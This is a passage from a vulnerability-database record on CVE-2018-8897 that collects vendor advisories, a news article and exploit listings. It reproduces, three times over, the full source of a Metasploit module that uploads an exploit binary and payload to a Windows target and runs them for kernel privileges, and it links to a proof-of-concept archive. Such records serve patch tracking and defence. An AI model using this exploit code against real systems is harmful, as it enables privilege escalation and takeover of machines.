Linux kernel, before 4.14.15, might allow attackers to cause a denial of service (integer overflow) or possibly have unspecified other impacts by triggering a negative wake or requeue value.\n\n", "edition": 1, "modified": "2018-05-14T00:00:00", "published": "2018-05-14T00:00:00", "id": "VZA-2018-028", "href": "https://help.virtuozzo.com/customer/portal/articles/2939246", "title": "Important kernel security update: CVE-2017-5754 and other; new kernel 2.6.32-042stab129.1 for Virtuozzo Containers for Linux 4.7, Server Bare Metal 5.0", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:17", "bulletinFamily": "unix", "cvelist": ["CVE-2017-5715", "CVE-2017-5754", "CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* hw: cpu: speculative execution permission faults handling (CVE-2017-5754, x86 32-bit)\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Google Project Zero for reporting CVE-2017-5754 and Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting CVE-2018-8897.\n\nBug Fix(es):\n\n* The kernel build requirements have been updated to the GNU Compiler Collection (GCC) compiler version that has the support for Retpolines. The Retpolines mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. (BZ#1554253)", "modified": "2018-05-10T22:12:54", "published": "2018-05-09T00:17:11", "id": "RHSA-2018:1346", "href": "https://access.redhat.com/errata/RHSA-2018:1346", "type": "redhat", "title": "(RHSA-2018:1346) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:47:12", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* Kernel: error in exception handling leads to DoS (CVE-2018-8897)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting this issue.", "modified": "2018-05-09T02:06:26", "published": "2018-05-09T01:59:05", "id": "RHSA-2018:1352", "href": "https://access.redhat.com/errata/RHSA-2018:1352", "type": "redhat", "title": "(RHSA-2018:1352) Moderate: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2020-09-10T06:41:01", "bulletinFamily": "software", "cvelist": ["CVE-2018-8897"], "description": "A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, some Xen configurations, or FreeBSD, or a Linux kernel. Some of Huawei products also be affected for this vulnerability. An attacker may exploit this vulnerability to escalate their privileges. (Vulnerability ID: HWPSIRT-2018-05100)\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2018-8897.\nHuawei has released software updates to fix this vulnerability. This advisory is available at the following link:\nhttp://www.huawei.com/en/psirt/security-advisories/huawei-sa-20181010-01-debug-en", "edition": 1, "modified": "2020-09-09T00:00:00", "published": "2019-09-21T00:00:00", "id": "HUAWEI-SA-20181010-01-DEBUG", "href": "https://www.huawei.com/en/psirt/security-advisories/2018/huawei-sa-20181010-01-debug-en", "title": "Security Advisory - Privilege Escalation Vulnerability in Some Huawei Products", "type": "huawei", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:33", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "[2.6.39-400.298.7]\n- net/rds: Fix endless RNR situation (Hakon Bugge) [Orabug: 27645402] \n- x86/entry/64: Dont use IST entry for #BP stack (Andy Lutomirski) {CVE-2018-8897}", "edition": 5, "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "ELSA-2018-4097", "href": "http://linux.oracle.com/errata/ELSA-2018-4097.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-07-13T21:54:00", "description": "This Metasploit module exploits a vulnerability in a statement in the system programming guide of the Intel 64 and IA-32 architectures software developer's manual being mishandled in various operating system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS. This Metasploit module will upload the pre-compiled exploit and use it to execute the final payload in order to gain remote code execution.", "edition": 1, "published": "2018-07-13T00:00:00", "title": "Microsoft Windows #MicrosoftWindows POP/MOV SS Local Privilege Elevation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-07-13T00:00:00", "id": "1337DAY-ID-30720", "href": "https://0day.today/exploit/description/30720", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/post/common'\r\nrequire 'msf/core/post/file'\r\nrequire 'msf/core/post/windows/priv'\r\nrequire 'msf/core/post/windows/registry'\r\nrequire 'msf/core/exploit/exe'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in a statement in the system programming guide\r\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\r\n in various operating system kerneles, resulting in unexpected behavior for #DB\r\n excpetions that are deferred by MOV SS or POP SS.\r\n\r\n This module will upload the pre-compiled exploit and use it to execute the final\r\n payload in order to gain remote code execution.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Nick Peterson', # Original discovery (@nickeverdox)\r\n 'Nemanja Mulasmajic', # Original discovery (@0xNemi)\r\n 'Can BAPlA1/4k <can1357>', # PoC\r\n 'bwatters-r7' # msf module\r\n ],\r\n 'Platform' => [ 'win' ],\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'May 08 2018',\r\n 'References' =>\r\n [\r\n ['CVE', '2018-8897'],\r\n ['EDB', '44697'],\r\n ['BID', '104071'],\r\n ['URL', 'https://github.com/can1357/CVE-2018-8897/'],\r\n ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'DisablePayloadHandler' => 'False'\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('EXPLOIT_NAME',\r\n [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),\r\n OptString.new('PAYLOAD_NAME',\r\n [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),\r\n OptString.new('PATH',\r\n [false, 'Path to write binaries (%TEMP% by default).', nil]),\r\n OptInt.new('EXECUTE_DELAY',\r\n [false, 'The number of seconds to delay before executing the exploit', 3])\r\n ])\r\n end\r\n\r\n def setup\r\n super\r\n @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\r\n @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\r\n @exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i)\r\n @payload_name = \"#{payload_name}.exe\" unless payload_name.match(/\\.exe$/i)\r\n @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')\r\n @payload_path = \"#{temp_path}\\\\#{payload_name}\"\r\n @exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\r\n @payload_exe = generate_payload_exe\r\n end\r\n\r\n def validate_active_host\r\n begin\r\n host = session.session_host\r\n print_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n raise Msf::Exploit::Failed, 'Could not connect to session'\r\n end\r\n end\r\n\r\n def validate_remote_path(path)\r\n unless directory?(path)\r\n fail_with(Failure::Unreachable, \"#{path} does not exist on the target\")\r\n end\r\n end\r\n\r\n def validate_target\r\n if sysinfo['Architecture'] == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\r\n end\r\n if sysinfo['OS'] =~ /XP/\r\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\r\n end\r\n end\r\n\r\n def ensure_clean_destination(path)\r\n if file?(path)\r\n print_status(\"#{path} already exists on the target. Deleting...\")\r\n begin\r\n file_rm(path)\r\n print_status(\"Deleted #{path}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(\"Unable to delete #{path}\")\r\n end\r\n end\r\n end\r\n\r\n def ensure_clean_exploit_destination\r\n ensure_clean_destination(exploit_path)\r\n end\r\n\r\n def ensure_clean_payload_destination\r\n ensure_clean_destination(payload_path)\r\n end\r\n\r\n def upload_exploit\r\n local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe')\r\n upload_file(exploit_path, local_exploit_path)\r\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\r\n end\r\n\r\n def upload_payload\r\n write_file(payload_path, payload_exe)\r\n print_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\")\r\n end\r\n\r\n def execute_exploit\r\n sleep(datastore['EXECUTE_DELAY'])\r\n print_status(\"Running exploit #{exploit_path} with payload #{payload_path}\")\r\n output = cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\")\r\n vprint_status(output)\r\n end\r\n\r\n def exploit\r\n begin\r\n validate_active_host\r\n validate_target\r\n validate_remote_path(temp_path)\r\n ensure_clean_exploit_destination\r\n ensure_clean_payload_destination\r\n upload_exploit\r\n upload_payload\r\n execute_exploit\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(e.message)\r\n ensure_clean_exploit_destination\r\n ensure_clean_payload_destination\r\n end\r\n end\r\n\r\n attr_reader :exploit_name\r\n attr_reader :payload_name\r\n attr_reader :payload_exe\r\n attr_reader :temp_path\r\n attr_reader :payload_path\r\n attr_reader :exploit_path\r\nend\n\n# 0day.today [2018-07-13] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30720"}], "packetstorm": [{"lastseen": "2018-07-14T02:42:05", "description": "", "published": "2018-07-13T00:00:00", "type": "packetstorm", "title": "Microsoft Windows POP/MOV SS Local Privilege Elevation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-07-13T00:00:00", "id": "PACKETSTORM:148549", "href": "https://packetstormsecurity.com/files/148549/Microsoft-Windows-POP-MOV-SS-Local-Privilege-Elevation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core/post/common' \nrequire 'msf/core/post/file' \nrequire 'msf/core/post/windows/priv' \nrequire 'msf/core/post/windows/registry' \nrequire 'msf/core/exploit/exe' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::Common \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability', \n'Description' => %q{ \nThis module exploits a vulnerability in a statement in the system programming guide \nof the Intel 64 and IA-32 architectures software developer's manual being mishandled \nin various operating system kerneles, resulting in unexpected behavior for #DB \nexcpetions that are deferred by MOV SS or POP SS. \n \nThis module will upload the pre-compiled exploit and use it to execute the final \npayload in order to gain remote code execution. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Nick Peterson', # Original discovery (@nickeverdox) \n'Nemanja Mulasmajic', # Original discovery (@0xNemi) \n'Can BAPlA1/4k <can1357>', # PoC \n'bwatters-r7' # msf module \n], \n'Platform' => [ 'win' ], \n'SessionTypes' => [ 'meterpreter' ], \n'Targets' => \n[ \n[ 'Windows x64', { 'Arch' => ARCH_X64 } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'May 08 2018', \n'References' => \n[ \n['CVE', '2018-8897'], \n['EDB', '44697'], \n['BID', '104071'], \n['URL', 'https://github.com/can1357/CVE-2018-8897/'], \n['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/'] \n], \n'DefaultOptions' => \n{ \n'DisablePayloadHandler' => 'False' \n} \n)) \n \nregister_options([ \nOptString.new('EXPLOIT_NAME', \n[false, 'The filename to use for the exploit binary (%RAND% by default).', nil]), \nOptString.new('PAYLOAD_NAME', \n[false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]), \nOptString.new('PATH', \n[false, 'Path to write binaries (%TEMP% by default).', nil]), \nOptInt.new('EXECUTE_DELAY', \n[false, 'The number of seconds to delay before executing the exploit', 3]) \n]) \nend \n \ndef setup \nsuper \n@exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) \n@payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) \n@exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i) \n@payload_name = \"#{payload_name}.exe\" unless payload_name.match(/\\.exe$/i) \n@temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP') \n@payload_path = \"#{temp_path}\\\\#{payload_name}\" \n@exploit_path = \"#{temp_path}\\\\#{exploit_name}\" \n@payload_exe = generate_payload_exe \nend \n \ndef validate_active_host \nbegin \nhost = session.session_host \nprint_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\") \nrescue Rex::Post::Meterpreter::RequestError => e \nelog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nraise Msf::Exploit::Failed, 'Could not connect to session' \nend \nend \n \ndef validate_remote_path(path) \nunless directory?(path) \nfail_with(Failure::Unreachable, \"#{path} does not exist on the target\") \nend \nend \n \ndef validate_target \nif sysinfo['Architecture'] == ARCH_X86 \nfail_with(Failure::NoTarget, 'Exploit code is 64-bit only') \nend \nif sysinfo['OS'] =~ /XP/ \nfail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') \nend \nend \n \ndef ensure_clean_destination(path) \nif file?(path) \nprint_status(\"#{path} already exists on the target. Deleting...\") \nbegin \nfile_rm(path) \nprint_status(\"Deleted #{path}\") \nrescue Rex::Post::Meterpreter::RequestError => e \nelog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nprint_error(\"Unable to delete #{path}\") \nend \nend \nend \n \ndef ensure_clean_exploit_destination \nensure_clean_destination(exploit_path) \nend \n \ndef ensure_clean_payload_destination \nensure_clean_destination(payload_path) \nend \n \ndef upload_exploit \nlocal_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe') \nupload_file(exploit_path, local_exploit_path) \nprint_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\") \nend \n \ndef upload_payload \nwrite_file(payload_path, payload_exe) \nprint_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\") \nend \n \ndef execute_exploit \nsleep(datastore['EXECUTE_DELAY']) \nprint_status(\"Running exploit #{exploit_path} with payload #{payload_path}\") \noutput = cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\") \nvprint_status(output) \nend \n \ndef exploit \nbegin \nvalidate_active_host \nvalidate_target \nvalidate_remote_path(temp_path) \nensure_clean_exploit_destination \nensure_clean_payload_destination \nupload_exploit \nupload_payload \nexecute_exploit \nrescue Rex::Post::Meterpreter::RequestError => e \nelog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") \nprint_error(e.message) \nensure_clean_exploit_destination \nensure_clean_payload_destination \nend \nend \n \nattr_reader :exploit_name \nattr_reader :payload_name \nattr_reader :payload_exe \nattr_reader :temp_path \nattr_reader :payload_path \nattr_reader :exploit_path \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148549/mov_ss.rb.txt"}], "freebsd": [{"lastseen": "2019-05-29T18:31:56", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8897"], "description": "\nProblem Description:\nThe MOV SS and POP SS instructions inhibit debug exceptions\n\tuntil the instruction boundary following the next instruction.\n\tIf that instruction is a system call or similar instruction\n\tthat transfers control to the operating system, the debug\n\texception will be handled in the kernel context instead of\n\tthe user context.\nImpact:\nAn authenticated local attacker may be able to read\n\tsensitive data in kernel memory, control low-level operating\n\tsystem functions, or may panic the system.\n", "edition": 5, "modified": "2018-05-08T00:00:00", "published": "2018-05-08T00:00:00", "id": "521CE804-52FD-11E8-9123-A4BADB2F4699", "href": "https://vuxml.freebsd.org/freebsd/521ce804-52fd-11e8-9123-a4badb2f4699.html", "title": "FreeBSD -- Mishandling of x86 debug exceptions", "type": "freebsd", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2018-05-24T14:24:06", "description": "Microsoft Windows - 'POP/MOV SS' Privilege Escalation. CVE-2018-8897. Local exploit for Windows platform", "published": "2018-05-22T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - 'POP/MOV SS' Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-05-22T00:00:00", "id": "EDB-ID:44697", "href": "https://www.exploit-db.com/exploits/44697/", "sourceData": "Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages.\r\n\r\n- KVA Shadowing should be disabled and the relevant security update should be uninstalled.\r\n- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44697.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44697/"}, {"lastseen": "2018-07-14T01:08:35", "description": "Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit). CVE-2018-8897. Local exploit for Windows platform. Tags: Metasploit Framework (MSF), L...", "published": "2018-07-13T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-8897"], "modified": "2018-07-13T00:00:00", "id": "EDB-ID:45024", "href": "https://www.exploit-db.com/exploits/45024/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core/post/common'\r\nrequire 'msf/core/post/file'\r\nrequire 'msf/core/post/windows/priv'\r\nrequire 'msf/core/post/windows/registry'\r\nrequire 'msf/core/exploit/exe'\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in a statement in the system programming guide\r\n of the Intel 64 and IA-32 architectures software developer's manual being mishandled\r\n in various operating system kerneles, resulting in unexpected behavior for #DB\r\n excpetions that are deferred by MOV SS or POP SS.\r\n\r\n This module will upload the pre-compiled exploit and use it to execute the final\r\n payload in order to gain remote code execution.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Nick Peterson', # Original discovery (@nickeverdox)\r\n 'Nemanja Mulasmajic', # Original discovery (@0xNemi)\r\n 'Can B\u00f6l\u00fck <can1357>', # PoC\r\n 'bwatters-r7' # msf module\r\n ],\r\n 'Platform' => [ 'win' ],\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'May 08 2018',\r\n 'References' =>\r\n [\r\n ['CVE', '2018-8897'],\r\n ['EDB', '44697'],\r\n ['BID', '104071'],\r\n ['URL', 'https://github.com/can1357/CVE-2018-8897/'],\r\n ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'DisablePayloadHandler' => 'False'\r\n }\r\n ))\r\n\r\n register_options([\r\n OptString.new('EXPLOIT_NAME',\r\n [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),\r\n OptString.new('PAYLOAD_NAME',\r\n [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),\r\n OptString.new('PATH',\r\n [false, 'Path to write binaries (%TEMP% by default).', nil]),\r\n OptInt.new('EXECUTE_DELAY',\r\n [false, 'The number of seconds to delay before executing the exploit', 3])\r\n ])\r\n end\r\n\r\n def setup\r\n super\r\n @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\r\n @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))\r\n @exploit_name = \"#{exploit_name}.exe\" unless exploit_name.match(/\\.exe$/i)\r\n @payload_name = \"#{payload_name}.exe\" unless payload_name.match(/\\.exe$/i)\r\n @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')\r\n @payload_path = \"#{temp_path}\\\\#{payload_name}\"\r\n @exploit_path = \"#{temp_path}\\\\#{exploit_name}\"\r\n @payload_exe = generate_payload_exe\r\n end\r\n\r\n def validate_active_host\r\n begin\r\n host = session.session_host\r\n print_status(\"Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n raise Msf::Exploit::Failed, 'Could not connect to session'\r\n end\r\n end\r\n\r\n def validate_remote_path(path)\r\n unless directory?(path)\r\n fail_with(Failure::Unreachable, \"#{path} does not exist on the target\")\r\n end\r\n end\r\n\r\n def validate_target\r\n if sysinfo['Architecture'] == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')\r\n end\r\n if sysinfo['OS'] =~ /XP/\r\n fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')\r\n end\r\n end\r\n\r\n def ensure_clean_destination(path)\r\n if file?(path)\r\n print_status(\"#{path} already exists on the target. Deleting...\")\r\n begin\r\n file_rm(path)\r\n print_status(\"Deleted #{path}\")\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(\"Unable to delete #{path}\")\r\n end\r\n end\r\n end\r\n\r\n def ensure_clean_exploit_destination\r\n ensure_clean_destination(exploit_path)\r\n end\r\n\r\n def ensure_clean_payload_destination\r\n ensure_clean_destination(payload_path)\r\n end\r\n\r\n def upload_exploit\r\n local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe')\r\n upload_file(exploit_path, local_exploit_path)\r\n print_status(\"Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}\")\r\n end\r\n\r\n def upload_payload\r\n write_file(payload_path, payload_exe)\r\n print_status(\"Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}\")\r\n end\r\n\r\n def execute_exploit\r\n sleep(datastore['EXECUTE_DELAY'])\r\n print_status(\"Running exploit #{exploit_path} with payload #{payload_path}\")\r\n output = cmd_exec('cmd.exe', \"/c #{exploit_path} #{payload_path}\")\r\n vprint_status(output)\r\n end\r\n\r\n def exploit\r\n begin\r\n validate_active_host\r\n validate_target\r\n validate_remote_path(temp_path)\r\n ensure_clean_exploit_destination\r\n ensure_clean_payload_destination\r\n upload_exploit\r\n upload_payload\r\n execute_exploit\r\n rescue Rex::Post::Meterpreter::RequestError => e\r\n elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\")\r\n print_error(e.message)\r\n ensure_clean_exploit_destination\r\n ensure_clean_payload_destination\r\n end\r\n end\r\n\r\n attr_reader :exploit_name\r\n attr_reader :payload_name\r\n attr_reader :payload_exe\r\n attr_reader :temp_path\r\n attr_reader :payload_path\r\n attr_reader :exploit_path\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/45024/"}], "threatpost": [{"lastseen": "2019-04-25T05:49:58", "bulletinFamily": "info", "cvelist": ["CVE-2018-8897"], "description": "Multiple operating system vendors issued coordinated patches this week to address a common vulnerability across their platforms, which was introduced thanks to widespread misinterpretation of Intel developer documentation.\n\nAccording to the CERT/CC team, [most major players](<https://www.kb.cert.org/vuls/byvendor?searchview&Query=FIELD+Reference=631579&SearchOrder=4>) (including Apple, FreeBSD, Microsoft, Red Hat, Ubuntu, VMWare and Xen, plus distros based on the Linux Kernel OS) built an uncannily similar privilege escalation flaw into their Intel-based products.\n\nThe flaw isn\u2019t remotely exploitable \u2013 a bad actor would need to gain local access to the victim\u2019s machine via malware or stolen credentials. But once in, CERT/CC explained that an attacker armed with OS APIs could access sensitive memory information, and also \u201ccontrol low-level OS functions\u201d by gaining elevated access privileges to the kernel level \u2013 i.e., hijack the code that controls the PC, Mac or VM.\n\nFrom there, Microsoft [explained](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8897>), it\u2019s possible to install programs and malware; view, change or delete data; or create new accounts with full user rights.\n\nOn the more innocuous end of the threat-level spectrum, the issue can also simply crash the kernel by confusing the system, causing a denial-of-service state.\n\nOn the more technical front, the flaw ([CVE-2018-8897](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897>)) resides in a debug exception in the x86-64 architectures. To be clear, the issue doesn\u2019t exist in the chip itself, but rather in the way developers have built their software stacks to interact with the processor.\n\nAs Red Hat explained, modern processors provide debugging infrastructure, used by system designers and application developers to debug their software and monitor events, including memory access (read or write), instruction execution and I/O port access.\n\n\u201cWhen such an event occurs during program execution, the processor raises a Debug Exception (#DB) to transfer execution control to debugging software,\u201d the company said in its [overview](<https://access.redhat.com/security/vulnerabilities/pop_ss>) of the flaw. \u201cThis catches the debug exception and allows a developer to examine program execution state.\u201d\n\nDevelopers appear to have widely misunderstood the way Intel processors handle that exception, leading to the same issue popping up across the computing landscape.\n\n\u201cThe error appears to be due to developer interpretation of existing documentation for certain Intel architecture interrupt/exception instructions, namely MOV to SS and POP to SS,\u201d CERT/CC said.\n\nThe CERT/CC team explained the problem in an [advisory](<https://www.kb.cert.org/vuls/id/631579>): \u201cIn certain circumstances, after the use of certain Intel x86-64 architecture instructions, a debug exception pointing to data in a lower ring (for most operating systems, the kernel Ring 0 level) is made available to operating system components running in Ring 3.\u201d\n\nNick Peterson of Everdox Tech, who first uncovered the vulnerability, pointed the finger at what he said was Intel\u2019s lack of clarity in its instruction manual. In a [technical brief](<http://everdox.net/popss.pdf>), he noted, \u201cThis is a serious security vulnerability and oversight made by operating system vendors due to unclear and perhaps even incomplete documentation.\u201d\n\nWe reached out to Intel and received an official statement:\n\n_\u201cThe security of our customers and partners is important to us. __To help ensure clear communication with the developer community, we __are updating our [Software Developers Manual](<https://software.intel.com/en-us/articles/intel-sdm>)__ (SDM) with clarifying language on the secure use of the POP/MOV-SS instructions. We recommend that system software vendors evaluate their software to confirm their products handle the situations in question. More information is available [here](<https://www.kb.cert.org/vuls/id/631579>)__.\u201d_\n\nCreating secure computing environments obviously takes coordination between the chipmaker, software developers and vendors; however, there are always blind spots. In this case, once the chip is out the door, Intel has no visibility or control over how developers build software to use its silicon.\n", "modified": "2018-05-10T15:37:07", "published": "2018-05-10T15:37:07", "id": "THREATPOST:1C410BC5122B196A58BBDDCDA7A79983", "href": "https://threatpost.com/major-os-players-misinterpret-intel-docs-and-now-kernels-can-be-hijacked/131869/", "type": "threatpost", "title": "Major OS Players Misinterpret Intel Docs, and Now Kernels Can Be Hijacked", "cvss": {"score": 7.2, "vector": 